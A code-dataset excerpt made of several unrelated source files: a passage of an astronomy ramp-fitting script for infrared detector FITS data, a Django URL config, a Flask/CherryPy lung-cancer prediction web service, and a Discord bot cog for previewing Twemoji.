ref+=scipy.ndimage.filters.median_filter(im[:,xpix], medfilterwidth)/np.size(ref_sides)
# pad the ref pixel value into a imdim x imdim square and subtract from image
im-=np.repeat(ref,imdim).reshape(imdim,imdim) # correct an error, used to be "tile" instead of "repeat", which pads in the wrong direction
# we filter independently the odd and even pixels in the bottom and top reference regions
odd_bottom=np.zeros([imdim,imdim//32],dtype=float) # contains a range from 0 to 1 on odd pixels, 1 at bottom, 0 at top
even_bottom=np.zeros([imdim,imdim//32],dtype=float)
odd_top=np.zeros([imdim,imdim//32],dtype=float)
even_top=np.zeros([imdim,imdim//32],dtype=float)
g_odd_bottom=np.zeros([imdim,imdim//32],dtype=bool) # contains a range from 0 to 1 on odd pixels, 1 at bottom, 0 at top
g_even_bottom=np.zeros([imdim,imdim//32],dtype=bool)
g_odd_top=np.zeros([imdim,imdim//32],dtype=bool)
g_even_top=np.zeros([imdim,imdim//32],dtype=bool)
frac=np.asarray(range(imdim))/(imdim-1.0)
for j in range(imdim//64):
odd_bottom[:,j*2+1]=1-frac
even_bottom[:,j*2]=1-frac
odd_top[:,j*2+1]=frac
even_top[:,j*2]=frac
g_odd_bottom[0:4,j*2+1]=True # contains a range from 0 to 1 on odd pixels, 1 at bottom, 0 at top
g_even_bottom[0:4,j*2]=True
g_odd_top[imdim-4:imdim,j*2+1]=True
g_even_top[imdim-4:imdim,j*2]=True
for j in range(32): # looping through the 32 outputs
# subtract median value of ref unilluminated pixels
ribbon = im[:,j*imdim//32:(j+1)*imdim//32]
y_even_bottom = nanmedian( ribbon[g_even_bottom])
y_odd_bottom = nanmedian( ribbon[g_odd_bottom])
y_even_top = nanmedian( ribbon[g_even_top])
y_odd_top = nanmedian( ribbon[g_odd_top])
im[:,j*imdim//32:(j+1)*imdim//32]-=( y_even_bottom*even_bottom+y_odd_bottom*odd_bottom+y_odd_top*odd_top+y_even_top*even_top)
return(im)
def patch_shift(im,bias):
# this bit of code
index=np.asarray(range(4,60,2))
cut1 = 0.2 # max CC for shifts that are invalid
cut2 = 0.9 # min CC for shifts that is valid
ccs = np.zeros(3)
print(np.shape(im))
i=0
for off in range(-1,2):
ccs[i]= (pearsonr(im[0,index],bias[0,off+index]))[0]
i+=1
message = 'Ambiguous Pearson correlation with bias... suspicious data!'
if (ccs[2] >= cut2) and (ccs[1]<=cut1) and (ccs[0]<=cut1):
message='We have a pixel shift problem... we correct it!'
xpix2=np.asarray(range(2048))
xpix=np.asarray(range(2048))
x64=np.asarray(range(64))
for i in range(32):
xpix[i*64:i*64+64]=(i*32)+((x64+(2*(i % 2)-1) ) % 64)
im[:,xpix2]=im[:,xpix]
if (ccs[1] >= cut2) and (ccs[2]<=cut1) and (ccs[0]<=cut1):
message = 'all good, there is no mischievous pixel shift in your data!'
print(message)
return(im)
# will be set to True if selfbias=True. If we use a file for bias (later update?) then this will also
# change the dobias to True
dobias = False
arg=np.asarray(sys.argv)
arg=arg[1:] # first argument is simply the name of the program and needs to be removed
write_cube = sum(arg=='-cube') ==1. # if set, then we will write cube, if not, then we skip this step that may be long
skip_error = sum(arg=='-noerror') ==1. # if set, we skip slope error
skip_ref = sum(arg=='-noref') ==1. # if set, we skip reference pixel corrections
linearize = sum(arg=='-linearize') ==1. # if set, we correct for non-linearity
selfbias = sum(arg=='-selfbias') ==1. # if set, we correct ref pixels on a frame-to-frame basis
nmax_set=False
for argn in arg:
if (argn)[0:3] == '-n=':
nmax_set=True
dim3=np.int( (argn)[3:] )
# here we remove arguments with a "-"
keep=np.zeros(len(arg))
for i in range(len(arg)):
keep[i] = (arg[i])[0] != '-'
arg=arg[keep ==1] # keep only params not beginning with a "-"
if len(arg)>=1:
odometer = arg[0] # first argument after program and flags is the output name
fic = arg[1:]
if len(fic)>=1:
h = pyfits.getheader(fic[0])
h2=h
mef_flag=0 # file is a MEF flag
cubefits_flag=0 # file is a CUBE flag
if len(fic) ==1:
naxis =h['naxis']
if naxis ==0:
mef_flag=1# we have a flag to know that the input file is a MEF and that extensions need to be read from there
if naxis==3:
cubefits_flag=1#this is a cuube
exists = np.zeros(len(fic),dtype=bool)
for i in range(len(fic)):
exists[i] = os.path.isfile(fic[i])
if np.sum(exists ==0) !=0:
print('some files given as inputs do not exist')
print('missing file(s) --')
print('')
missing=fic[exists !=1]
for i in range(len(missing)):
print(missing[i])
print('')
print('... you way also have given some erroneous input, double check your inputs dude!')
sys.exit()
if len(sys.argv) <=2:
print('***** !!! warning, something went wrong !!! *****')
print('')
print(' ----- you can provide a list of files as an input -----')
print('')
print('syntax : python fits2ramp.py outname directory/file*.fits -cube -noerror -linearize')
print('')
print('')
print(' the argument after the "outname" must be the files to combine')
print(' with the ramp-fitting algorithm. ex: 20170322140210/H2RG_R01_M01_N08*.fits ')
print(' should also accept *.fits.gz files')
print(' you need at least two files in the wildcard. You can also expliclty')
print(' name the files you combine.')
print(' The syntax would be :')
print(' python fits2ramp.py outname file1.fits file2.fits ... fileN.fits')
print('')
print(' ----- you can also provide a single file that has a MEF format -----')
print('')
print('syntax : python fits2ramp.py outname mef_file*.fits -cube -noerror -linearize')
print('')
print(' if you provide an outname and a single fits file, then we know its a MEF')
print('')
print(' if you provide a -n=XXXX then only the first XXXX readouts within the MEF')
print('')
print(' will be used for slope fitting')
print(' ---- some more options ----' )
print('')
print(' -cube saves all slices in a cube. This is slower and takes disk space')
print(' -noerror does not compute the slope error. This is faster.' )
print(' -linearize corrects for non-linearity. This is slower but more accurate.')
print('')
print(' If all goes well, the programs outputs 2 files: ')
print(' outnameo.fits ')
print(' ... ext=1, ramp frame' )
print(' ... ext=2, ramp intercept')
print(' ... ext=3, ramp error' )
print(' ... ext=4, ramp # valid frames')
print(' ... every where, NaN values trace saturated pixel')
print(' outnamer.fits.gz')
print(' ... cube with as many slices as there are files in the wildcard above')
print(' ... outnamer.fits.gz contains the same info as the files' )
print(' ... this is only done if we pass the "-cube" argument')
print('')
sys.exit()
#################################################################
#################################################################
# We need the size of the image. Should be 2048 or 4096 (H2RG/H4RG)
imdim=(np.shape(pyfits.getdata(fic[0])))[1]
if (imdim!=2048) and (imdim!=4096):
print('')
print('')
print(' something is really wrong with the size of the input image')
print(' the image '+fic[0]+' has a width of :',imdim,' pixel(s)')
print(' and we should only have values of 2048 or 4096 pixels')
print('')
print('')
sys.exit()
# reading the relevant calibrations
#mask = getdata(calibdir+'/mask.fits') # 0/1 mask defining the area of the science array used as pose-meter
mask=np.zeros([imdim,imdim],dtype=float) # dummy ~~~>>> will need to be changed for the H4RG
# this is the region used for the posemeter
# For SPIRou, we will have a binary mask selecting the H-band orders (science and not ref channel)
mask[1912:1938,572:777]=1
mask=np.where(mask ==1)
# non-linearity cube with 4 slices. The linearized flux will be derived from the measured flux with the
# following relation :
# F_lin = a0 + a1*(F_mea - bias) + a2*(F_mea - bias)**2 + a3*(F_mea - bias)**3
# where aN is the Nth slice of the linearity cube
# ... bias is the super-bias
# ... F_lin is the linearised flux
# ... F_mea is the measured flux
#linearity = getdata(calibdir+'/non_lin.fits') # we will use files with non-linearity correction here
# This is an operation that may be done if we do not have a bias in hand and want to
# correct non-linearity. Lets consider this under development and set it to False for now
#
linearity_saturation = pyfits.getdata('nonlin.fits')
# Slice 1 - 2nd ordre term of non-linearity correction
# Slice 2 - 3rd ordre term of non-linearity correction
linearity = linearity_saturation[0:2,:,:]
# Slice 3 - dynamical range for <20% non-linearity
saturation = linearity_saturation[2,:,:]
if mef_flag==0 and cubefits_flag==0:
if nmax_set == False:
dim3 = len(fic)
else:
if len(fic) < dim3:
print('You requested a ramp of ',dim3,' readouts... ')
print(' ... but you have only ',len(fic),' files')
sys.exit()
if mef_flag==1:
hdulist = pyfits.open(fic[0],memmap=False) ## We will use memmap when CFHT gets rid of BZERO/BSCALE/BLANK header keywords
dims=np.shape(hdulist[1])
if nmax_set == False:
dim3= len(hdulist)-1
else:
if (len(hdulist)-1) < dim3:
print('You requested a ramp of ',dim3,' readouts... ')
print(' ... but you have only ',len(hdulist)-1,' slices in your MEF')
sys.exit()
if cubefits_flag==1:
if nmax_set == False:
dim3 = h['naxis3']
else:
if (h['naxis3']) < dim3:
print('You requested a ramp of ',dim3,' readouts... ')
print(' ... but you have only ',len(hdulist)-1,' slices in your cube')
sys.exit()
# delete all keywords from the reference file
del_keywords=['DATLEVEL', 'ASICGAIN', 'NOMGAIN', 'AMPRESET', 'KTCREMOV', 'SRCCUR',\
'AMPINPUT', 'V4V3V2V1', 'PDDECTOR', 'CLKOFF', 'NADCS', 'INTTIME',\
'TSTATION', 'SEQNUM_N', 'SEQNUM_M', 'CLOCKING', 'NEXTRAP','NEXTRAL', 'SEQNNAME']
for key in del_keywords:
if key in h: # as keywords may change from version to version, we check if the keyword we want to delete is present
del h[key]
del h['bias*']
timestamp=np.zeros(dim3,dtype=float)
# loop to check image size and populate header with time stamps
for i in range(dim3):
if mef_flag==0 and cubefits_flag==0: # we have a mef file, info is in the ith extension
h_tmp = pyfits.getheader(fic[i])
if 'frmtime' not in h_tmp:
h_tmp['frmtime'] = 5.24288, 'assumed integration time (s)'
if 'inttime' not in h_tmp:
h_tmp['inttime'] = 5.24288*(i+1), 'assumed frame time (s)'
timestamp[i]=h_tmp['inttime']
if cubefits_flag==1: # we have a cube, calculate from FRMTIME
timestamp[i]= (i+1)*h['frmtime'] # sets zero time at the time of reset
if mef_flag==1: # we read the ith extension
h_tmp = hdulist[i+1].header
timestamp[i]=h_tmp['inttime']
if mef_flag==0 and cubefits_flag==0:
order = np.argsort(timestamp) # who knows, the files may not be in the right order! Lets sort them according to their timestamps
fic=fic[order]
timestamp=timestamp[order]
for i in range(dim3):
tag0 = str(i+1)
if len(tag0) < 4:
tag = '0'*(4-len(tag0))+tag0
tag = 'INTT'+tag
h[tag] = (timestamp[i],'Timestamp, '+tag0+'/'+str(dim3))
if mef_flag==1:
write_cube=False
if write_cube:
cube=np.zeros([dim3,dim2,dim1],dtype=float)
print('loading all files in cube')
for i in range(dim3):
print(i+1,'/',len(fic),fic[i])
im=pyfits.getdata(fic[i])
cube[i,:,:] = im
print('writing the cube file --> '+odometer+'r.fits ')
t1 = time.time()
hcube=h2
hcube['NAXIS'] = 3
hcube['NAXIS3'] = dim3
pyfits.writeto(odometer+'r.fits', cube,header=hcube)
# This operation is somewhat long and could lead to back-log of files on a slow machine
# ... for the code development, we time it. This may be remove at a later point.
print('Duration of file writting : '+str(float(time.time()-t1))+' s')
# zipping the .fits file. Normally this could be done within pyfits.writeto, but its much, much slower
os.system('gzip -f '+odometer+'r.fits &')
print('done writing the cube file --> '+odometer+'r.fits')
print(' compressing file in background ... ')
del cube # removing cube from memory to make things lighter... unclear in necessary
else:
print('we do not write the cube file for this ramp')
# place htimestampolders for some arithmetics for the linear fit
#sx = 0#np.zeros([dim2,dim1])
#sx2 = 0#np.zeros([dim2,dim1])
sy = np.zeros([imdim,imdim],dtype=float)
n = np.zeros([imdim,imdim],dtype=np.int16)
sxy = np.zeros([imdim,imdim],dtype=float)
fmask = np.zeros(dim3,dtype=float)
# mask for pixels that are valid
goodmask = np.full((imdim,imdim),True,dtype=bool)
# when a pixels goes above saturation, it remains invalid for the rest of the ramp
if skip_error == False:
savname=['']*dim3
print(mef_flag,cubefits_flag,linearize)
t_start=time.time()
for i in range(dim3):
t0=time.time()
print(i+1,'/',dim3,' ~~~> Computing slope')
if mef_flag==0 and cubefits_flag==0: # this is a set with N files
im = pyfits.getdata(fic[i])
if mef_flag==1:
im=hdulist[i+1].data # reading the Nth extension
if cubefits_flag==1:
if i ==0:
bigcube=pyfits.getdata(fic[0]) # that's dangerous as it may overfill memory
im=bigcube[i,:,:]
im = np.array(im,dtype='float')
if selfbias and (i ==0):
bias = np.array(im)
print('setting 1st extension as a bias file')
dobias=True
goodmask = (im <= saturation)*goodmask
if dobias:
if selfbias:
print('bias subtraction with 1st readout')
else:
print('bias subtraction with provided bias file')
im-=bias
if linearize:
print('applying non-lin correction')
# first we linearize the data by applying the non-linearity coefficients and bias correction
for j in range(2):
im += linearity[j,:,:]*(im)**(j+2)
if selfbias and (skip_ref == False):
print('as we applied self-bias, we correct ref pixels')
im=refpixcorr(im)
n+= goodmask
fmask[i]=np.nanmean( im[mask])
# m*=goodmask # starting now, only the product of the two is needed. saves one multipltication
# Actually, best not fill what used to be saturated elements in the array with
# 0, which is what this did. Then, if the errslope calculation wants to check
# im <= saturation as it used to do, it will come up with the wrong answer.
# Since the first check for im <= saturation (about 20 lines above) does so
# before linearity correction and this check would be after, they could also
# come up with different answers though, unless the linearity function is
# is guaranteed to apply a correction that keeps saturation values at the same
# ADU. Since we already have n[], when the errslope calculation happens, it
# uses that, now with a simple "goodmask = (n > i)" for each i on that pass.
sy[goodmask]+= im[goodmask]#*goodmask
sxy[goodmask]+=(im[goodmask]*timestamp[i])
# here we save the non-linearity corrected images as python npz files
# we could just dump everything into a big cube to be used in the slope
# error determination. We opt to write these files to disk to avoid overfilling
# the memory. This should be safer for very large number of reads.
#
# We cannot simply re-read the fits files are the "im" variable saved in the npz has been corrected for
# non-linearity, which is NOT the case for the .fits.gz. We save the NPZ only if the data is linearized
#
# We also corrected for the bias regions of the detector, so a temporary file is necessary if we want to properly compute slope error
# and cannot afford to keep everything in memory. Keeping everything in memory may be fine for small datasets, but we want
# to avoid having a code that crashes for long sequences or on machines with less memory!
if skip_error == False:
savname[i]='.tmp'+str(i)+'.npz'
np.savez(savname[i],im=im) # this file is temporary and will be deleted after computing the slope error
dt=(time.time()-t_start)/(i+1.0)
print('dt[last image] ','{:5.2f}'.format(time.time()-t0),'s; dt[mean/image] ','{:5.2f}'.format(dt),'s; estimated time left '+'{:3.0f}'.format(np.floor((dim3-i)*dt/60))+'m'+'{:2.0f}'.format(np.floor((dim3-i)*dt % 60))+'s')
# we now have these variables outside the loop. We keep n that contains the
# number of valid reads, and directely interpolate the vector with the cumulative
# sum of timestamp and timestamp**2. Previously, we added these values to the sx and sx2
# matrices for each frame. This operation is much, much faster and equivalent.
sx=np.where(n>0,(np.cumsum(timestamp))[n-1],0)
sx2=np.where(n>0,(np.cumsum(timestamp**2))[n-1],0)
if mef_flag==1:
hdulist.close()
fmask-=fmask[0]
for i in range(dim3):
tag0 = str(i+1)
if len(tag0) < 4:
tag = '0'*(4-len(tag))+tag0
tag = 'POSE'+tag
h[tag] = (fmask[i],'Posemeter, '+tag0+'/'+str(len(fic)))
a = np.zeros([imdim,imdim],dtype=float)+np.nan # slope, NaN if not enough valid readouts
b = np.zeros([imdim,imdim],dtype=float)+np.nan # intercept
valid=n>1 # only valid where there's more than one good readout(s)
b[valid] = (sx*sxy-sx2*sy)[valid]/(sx**2-n*sx2)[valid] # algebra of the linear fit
a[valid] = (sy-n*b)[valid]/sx[valid]
# For the sake of consistency, we fix the slope, error and intercept to NaN for
# pixels that have 0 or 1 valid (i.e., not saturated) values and for which
# one cannot determine a valid slope
errslope = np.zeros([imdim,imdim],dtype=float)+np.nan
goodmask = np.full((imdim,imdim),True,dtype=bool)
if skip_error == False:
varx2 = np.zeros([imdim,imdim],dtype=float)
vary2 = np.zeros([imdim,imdim],dtype=float)
xp = np.zeros([imdim,imdim],dtype=float)
valid = (n>2)
xp[valid]=sx[valid]/n[valid] # used in the determination of error below
print('we now compute the standard error on the slope')
for i in range(dim3):
# we read the npz as this file has been linearized (if the -linearize keyword has been set)
# and we subtracted the reference regions on the array
data=np.load(savname[i])
os.system('rm '+savname[i])
im=data['im']
goodmask = (n > i)
yp = b+a*timestamp[i]
print(i+1,'/',dim3,' ~~~> Computing slope error')
varx2+= ((timestamp[i]-xp)**2)*goodmask # we multiply by goodmask so that only
vary2+= ((im-yp)**2)*goodmask
valid*=(varx2!=0) # avoid diving by zero
errslope[valid] = np.sqrt(vary2[valid]/(n[valid]-2))/np.sqrt(varx2[valid])
# deleting the temporary npz
else:
print(' We do not calculate the error on slope.')
print(' This is faster and intended for debugging but ')
print(' ultimately we will want to compute slope error ')
print(' for all files')
h['satur1']=(nanmedian(saturation),'median saturation limit in ADU')
h['satur2']=(nanmedian(saturation)/max(timestamp),'median saturation limit in ADU/s')
dfmask = fmask[1:]-fmask[0:-1] # flux received between readouts
dtimestamp = timestamp[1:]+0.5*(timestamp[-1]-timestamp[0])/(len(timestamp)-1) # mid-time of Nth readout
### we estimate the RON by checking the slope error in pixels receiving little flux
### as the orders cover ~50% of the science array, we take the median slope error of
### pixels that are below the median slope. We assume that these pixels have an RMS that is
### dominated by readout noise (TO BE CONFIRMED).
### we also clip pixels that are above 3x the median RMS
pseudodark = 0.0 # (a < np.median(a))*(errslope < 3*np.median(errslope))
ron_estimate = 0.0 #np.median(errslope[pseudodark])*(max(timestamp)-min(timestamp)) # converted into ADU instead of ADU/s
#### Standard FITS Keywords BITPIX = 16 / 16bit
h['BSCALE']=(1.0 , 'Scale factor')
#### FITS keyword related to the detector
h['RON_EST']=(ron_estimate , '[ADU] read noise estimate')
h['NSUBEXPS']=(len(fic) , 'Total number of sub-exposures of 5.5s ')
#h['TMID']= (np.sum(dtimestamp*dfmask)/np.sum(dfmask) , '[s] Flux-weighted mid-exposure time ' )
#h['CMEAN']= ( np.mean(dfmask)/(timestamp[1]-timestamp[0]), '[ADU/s] Average count posemeter' )
if skip_ref == False:
a=refpixcorr(a,oddeven=True)
a=np.float32(a)
if dobias:
# we subtracted the bias from all frames, we need to add it to the intercept
b+=bias
b=np.float32(b)
errslope=np.float32(errslope)
hdu1 = pyfits.PrimaryHDU()
hdu1.header = h
hdu1.header['NEXTEND'] = 4
hdu2 = pyfits.ImageHDU(a)
hdu2.header['UNITS'] = ('ADU/S','Slope of fit, flux vs time')
hdu2.header['EXTNAME'] = ('slope','Slope of fit, flux vs time')
hdu3 = pyfits.ImageHDU(b)
hdu3.header['UNITS'] = ('ADU','Intercept of the pixel/time fit.')
hdu3.header['EXTNAME'] = ('intercept','Intercept of the pixel/time fit.')
hdu4 = pyfits.ImageHDU(errslope)
hdu4.header['UNITS'] = ('ADU/S','Formal error on slope fit')
hdu4.header['EXTNAME'] = ('errslope','Formal error on slope fit')
hdu5 = pyfits.ImageHDU(n)
hdu5.header['UNITS'] = ('Nimages','N readouts below saturation')
hdu5.header['EXTNAME'] = ('count','N readouts below saturation')
new_hdul = pyfits.HDUList([hdu1, hdu2, hdu3, hdu4, hdu5])
# just to avoid an error message with writeto
if os.path.isfile(odometer+'.fits'):
print('file : '+odometer+'.fits exists, we are overwriting it')
os.system('rm '+odometer+'.fits')
new_hdul.writeto(odometer +'.fits', clobber=True)
print('Elapsed time for entire fits2ramp : '+str(float(time.time()-t0))+' s')
| 40.20411 | 225 | 0.665474 |
c90f386866b7264c9826cea39ffcc2b6fd5aaf00 | 394 | py | Python | blog/urls.py | encukou/Zpetnovazebnik | 0d058fd67049a3d42814b04486bde93bc406fa3b | [
"MIT"
] | 1 | 2019-12-04T10:10:53.000Z | 2019-12-04T10:10:53.000Z | blog/urls.py | encukou/Zpetnovazebnik | 0d058fd67049a3d42814b04486bde93bc406fa3b | [
"MIT"
] | 14 | 2019-04-07T07:46:07.000Z | 2022-03-11T23:44:31.000Z | blog/urls.py | encukou/Zpetnovazebnik | 0d058fd67049a3d42814b04486bde93bc406fa3b | [
"MIT"
] | 1 | 2019-02-16T09:25:51.000Z | 2019-02-16T09:25:51.000Z | from django.urls import path
from . import views
urlpatterns = [
path('', views.course_list, name='course_list'),
path('<course_slug>/', views.session_list, name='session_list'),
path('<course_slug>/<session_slug>/', views.session_detail, name='session_detail'),
path('<course_slug>/<session_slug>/<password>/', views.add_comment_to_session, name='add_comment_to_session'),
]
| 35.818182 | 114 | 0.72335 |
c912b5b1a08a02d640553311c19b5c840ef97729 | 4,651 | py | Python | web_app/api_service.py | shayan-taheri/sql_python_deep_learning | ceb2c41bcb1fed193080f64ba4da018d76166222 | [
"MIT"
] | 23 | 2017-11-29T17:33:30.000Z | 2021-10-15T14:51:12.000Z | web_app/api_service.py | shayan-taheri/sql_python_deep_learning | ceb2c41bcb1fed193080f64ba4da018d76166222 | [
"MIT"
] | 1 | 2017-10-12T11:23:08.000Z | 2017-10-12T11:23:08.000Z | web_app/api_service.py | isabella232/sql_python_deep_learning | ceb2c41bcb1fed193080f64ba4da018d76166222 | [
"MIT"
] | 16 | 2017-12-21T08:55:09.000Z | 2021-03-21T20:17:40.000Z | from api import app, BAD_PARAM, STATUS_OK, BAD_REQUEST
from flask import request, jsonify, abort, make_response,render_template, json
import sys
from lung_cancer.connection_settings import get_connection_string, TABLE_SCAN_IMAGES, TABLE_GIF, TABLE_MODEL, TABLE_FEATURES, LIGHTGBM_MODEL_NAME, DATABASE_NAME,NUMBER_PATIENTS
from lung_cancer.lung_cancer_utils import get_patients_id, get_patient_id_from_index, select_entry_where_column_equals_value, get_features, get_lightgbm_model, prediction
import pyodbc
import cherrypy
from paste.translogger import TransLogger
def run_server():
# Enable WSGI access logging via Paste
app_logged = TransLogger(app)
# Mount the WSGI callable object (app) on the root directory
cherrypy.tree.graft(app_logged, '/')
# Set the configuration of the web server
cherrypy.config.update({
'engine.autoreload_on': True,
'log.screen': True,
'log.error_file': "cherrypy.log",
'server.socket_port': 5000,
'server.socket_host': '0.0.0.0',
'server.thread_pool': 50, # 10 is default
})
# Start the CherryPy WSGI web server
cherrypy.engine.start()
cherrypy.engine.block()
# Connection
connection_string = get_connection_string()
conn = pyodbc.connect(connection_string)
cur = conn.cursor()
# Model
model = get_lightgbm_model(TABLE_MODEL, cur, LIGHTGBM_MODEL_NAME)
# Functions
@app.route("/")
def index():
cherrypy.log("CHERRYPY LOG: /")
return render_template('index.html')
@app.route('/gif/<patient_index>')
def patient_gif(patient_index):
patient_index = int(patient_index)
if patient_index > NUMBER_PATIENTS:
abort(BAD_REQUEST)
cherrypy.log("CHERRYPY LOG: /gif/<patient_index>")
gif_url = manage_gif(patient_index)
return make_response(jsonify({'status': STATUS_OK, 'gif_url': gif_url}), STATUS_OK)
@app.route('/predict/<patient_index>')
def predict_patient(patient_index):
patient_index = int(patient_index)
if patient_index > NUMBER_PATIENTS:
abort(BAD_REQUEST)
cherrypy.log("CHERRYPY LOG: /predict/<patient_index>")
prob = manage_prediction(patient_index)
return make_response(jsonify({'status': STATUS_OK, 'prob': prob}), STATUS_OK)
@app.route('/patient_info', methods=['POST'])
def patient_info():
cherrypy.log("CHERRYPY LOG: /patient_info")
patient_index = manage_request_patient_index(request.form['patient_index'])
gif_url = manage_gif(patient_index)
return render_template('patient.html', patient_index=patient_index, gif_url=gif_url)
@app.route('/patient_prob', methods=['POST'])
def patient_prob():
cherrypy.log("CHERRYPY LOG: /patient_prob")
patient_index = manage_request_patient_index(request.form['patient_index'])
prob = manage_prediction_store_procedure(patient_index)
gif_url = manage_gif(patient_index)
return render_template('patient.html', patient_index=patient_index, prob=round(prob,2), gif_url=gif_url)
def is_integer(s):
try:
int(s)
return True
except ValueError:
return False
def manage_request_patient_index(patient_request):
patient1 = "Anthony Embleton".lower()
patient2 = "Ana Fernandez".lower()
if patient_request.lower() in patient1:
patient_index = 1
elif patient_request.lower() in patient2:
patient_index = 175
else:
if is_integer(patient_request):
patient_index = int(patient_request)
if patient_index > NUMBER_PATIENTS:
patient_index = NUMBER_PATIENTS - 1
else:
patient_index = 7
return patient_index
def manage_gif(patient_index):
patient_id = get_patient_id_from_index(TABLE_SCAN_IMAGES, cur, patient_index)
print(patient_id)
resp = select_entry_where_column_equals_value(TABLE_GIF, cur, 'patient_id', patient_id)
gif_url = resp[1]
print("gif_url: ",gif_url)
return gif_url
def manage_prediction(patient_index):
patient_id = get_patient_id_from_index(TABLE_SCAN_IMAGES, cur, patient_index)
feats = get_features(TABLE_FEATURES, cur, patient_id)
probability_cancer = prediction(model, feats)
prob = float(probability_cancer)*100
return prob
def manage_prediction_store_procedure(patient_index):
query = "DECLARE @PredictionResultSP FLOAT;"
query += "EXECUTE " + DATABASE_NAME + ".dbo.PredictLungCancer @PatientIndex = ?, @ModelName = " + \
LIGHTGBM_MODEL_NAME + ", @PredictionResult = @PredictionResultSP;"
cur.execute(query, patient_index)
prob = cur.fetchone()[0]
return prob
if __name__ == "__main__":
run_server()
conn.close() | 33.221429 | 176 | 0.723285 |
c9144a2b1a0cbf40a3d765da71a5f9435588a292 | 335 | py | Python | 10-blood/scripts/bloodMeasure.py | antl-mipt-ru/get | c914bd16131639e1af4452ae7351f2554ef83ce9 | [
"MIT"
] | null | null | null | 10-blood/scripts/bloodMeasure.py | antl-mipt-ru/get | c914bd16131639e1af4452ae7351f2554ef83ce9 | [
"MIT"
] | null | null | null | 10-blood/scripts/bloodMeasure.py | antl-mipt-ru/get | c914bd16131639e1af4452ae7351f2554ef83ce9 | [
"MIT"
] | 1 | 2021-10-11T16:24:32.000Z | 2021-10-11T16:24:32.000Z | import bloodFunctions as blood
import time
try:
samples = []
blood.initSpiAdc()
start = time.time()
while (time.time() - start) < 60:
samples.append(blood.getAdc())
finish = time.time()
blood.deinitSpiAdc()
blood.save(samples, start, finish)
finally:
print("Blood measure script finished") | 17.631579 | 42 | 0.641791 |
c915f05bb0ce24d1fe5469fea260ce3e99ceb13c | 5,144 | py | Python | bot/exts/utilities/twemoji.py | thatbirdguythatuknownot/sir-lancebot | 7fd74af261385bdf7d989f459bec4c9b0cb4392a | [
"MIT"
] | 77 | 2018-11-19T18:38:50.000Z | 2020-11-16T22:49:59.000Z | bot/exts/utilities/twemoji.py | thatbirdguythatuknownot/sir-lancebot | 7fd74af261385bdf7d989f459bec4c9b0cb4392a | [
"MIT"
] | 373 | 2018-11-17T16:06:06.000Z | 2020-11-20T22:55:03.000Z | bot/exts/utilities/twemoji.py | thatbirdguythatuknownot/sir-lancebot | 7fd74af261385bdf7d989f459bec4c9b0cb4392a | [
"MIT"
] | 165 | 2018-11-19T04:04:44.000Z | 2020-11-18T17:53:28.000Z | import logging
import re
from typing import Literal, Optional
import discord
from discord.ext import commands
from emoji import UNICODE_EMOJI_ENGLISH, is_emoji
from bot.bot import Bot
from bot.constants import Colours, Roles
from bot.utils.decorators import whitelist_override
from bot.utils.extensions import invoke_help_command
log = logging.getLogger(__name__)
BASE_URLS = {
"png": "https://raw.githubusercontent.com/twitter/twemoji/master/assets/72x72/",
"svg": "https://raw.githubusercontent.com/twitter/twemoji/master/assets/svg/",
}
CODEPOINT_REGEX = re.compile(r"[a-f1-9][a-f0-9]{3,5}$")
class Twemoji(commands.Cog):
"""Utilities for working with Twemojis."""
def __init__(self, bot: Bot):
self.bot = bot
@staticmethod
def get_url(codepoint: str, format: Literal["png", "svg"]) -> str:
"""Returns a source file URL for the specified Twemoji, in the corresponding format."""
return f"{BASE_URLS[format]}{codepoint}.{format}"
@staticmethod
def alias_to_name(alias: str) -> str:
"""
Transform a unicode alias to an emoji name.
Example usages:
>>> alias_to_name(":falling_leaf:")
"Falling leaf"
>>> alias_to_name(":family_man_girl_boy:")
"Family man girl boy"
"""
name = alias.strip(":").replace("_", " ")
return name.capitalize()
@staticmethod
def build_embed(codepoint: str) -> discord.Embed:
"""Returns the main embed for the `twemoji` commmand."""
emoji = "".join(Twemoji.emoji(e) or "" for e in codepoint.split("-"))
embed = discord.Embed(
title=Twemoji.alias_to_name(UNICODE_EMOJI_ENGLISH[emoji]),
description=f"{codepoint.replace('-', ' ')}\n[Download svg]({Twemoji.get_url(codepoint, 'svg')})",
colour=Colours.twitter_blue,
)
embed.set_thumbnail(url=Twemoji.get_url(codepoint, "png"))
return embed
@staticmethod
def emoji(codepoint: Optional[str]) -> Optional[str]:
"""
Returns the emoji corresponding to a given `codepoint`, or `None` if no emoji was found.
The return value is an emoji character, such as "🍂". The `codepoint`
argument can be of any format, since it will be trimmed automatically.
"""
if code := Twemoji.trim_code(codepoint):
return chr(int(code, 16))
@staticmethod
def codepoint(emoji: Optional[str]) -> Optional[str]:
"""
Returns the codepoint, in a trimmed format, of a single emoji.
`emoji` should be an emoji character, such as "🐍" and "🥰", and
not a codepoint like "1f1f8". When working with combined emojis,
such as "🇸🇪" and "👨👩👦", send the component emojis through the method
one at a time.
"""
if emoji is None:
return None
return hex(ord(emoji)).removeprefix("0x")
@staticmethod
def trim_code(codepoint: Optional[str]) -> Optional[str]:
"""
Returns the meaningful information from the given `codepoint`.
If no codepoint is found, `None` is returned.
Example usages:
>>> trim_code("U+1f1f8")
"1f1f8"
>>> trim_code("\u0001f1f8")
"1f1f8"
>>> trim_code("1f466")
"1f466"
"""
if code := CODEPOINT_REGEX.search(codepoint or ""):
return code.group()
@staticmethod
def codepoint_from_input(raw_emoji: tuple[str, ...]) -> str:
"""
Returns the codepoint corresponding to the passed tuple, separated by "-".
The return format matches the format used in URLs for Twemoji source files.
Example usages:
>>> codepoint_from_input(("🐍",))
"1f40d"
>>> codepoint_from_input(("1f1f8", "1f1ea"))
"1f1f8-1f1ea"
>>> codepoint_from_input(("👨👧👦",))
"1f468-200d-1f467-200d-1f466"
"""
raw_emoji = [emoji.lower() for emoji in raw_emoji]
if is_emoji(raw_emoji[0]):
emojis = (Twemoji.codepoint(emoji) or "" for emoji in raw_emoji[0])
return "-".join(emojis)
emoji = "".join(
Twemoji.emoji(Twemoji.trim_code(code)) or "" for code in raw_emoji
)
if is_emoji(emoji):
return "-".join(Twemoji.codepoint(e) or "" for e in emoji)
raise ValueError("No codepoint could be obtained from the given input")
@commands.command(aliases=("tw",))
@whitelist_override(roles=(Roles.everyone,))
async def twemoji(self, ctx: commands.Context, *raw_emoji: str) -> None:
"""Sends a preview of a given Twemoji, specified by codepoint or emoji."""
if len(raw_emoji) == 0:
await invoke_help_command(ctx)
return
try:
codepoint = self.codepoint_from_input(raw_emoji)
except ValueError:
raise commands.BadArgument(
"please include a valid emoji or emoji codepoint."
)
